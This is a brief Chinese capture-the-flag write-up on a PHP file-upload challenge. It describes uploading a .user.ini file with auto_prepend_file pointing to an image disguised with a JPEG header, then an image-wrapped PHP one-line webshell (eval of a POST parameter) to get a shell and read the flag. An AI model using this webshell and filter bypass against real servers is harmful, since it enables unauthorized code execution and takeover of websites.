参考博客:https://www.cnblogs.com/20175211lyz/p/11455355.html
首先先来看看.user.ini文件
利用.user.ini上传\隐藏后门
参考链接:user.ini文件构成的PHP后门
条件:
- 1、服务器脚本语言为PHP
- 2、服务器使用CGI/FastCGI模式
- 3、上传目录下要有可执行的php文件
对于这道题目,已经提示了需要上传文件拿shell,上传一句话木马后提示需要上传图片,上传图片马又发现被过滤了<?。随后从其他dalao博客发现,可以上传.user.ini文件
auto_prepend_file=test.jpg (需要添加图片文件头FFD8FFE000104A4649460D0A)
同时再上传图片马
<script language="php">eval($_POST['a']);</script>(同样需要添加上列图片文件头)
此时通过Post可以拿shell
再进行文件扫描
发现
于是通过readfile()函数拿到flag
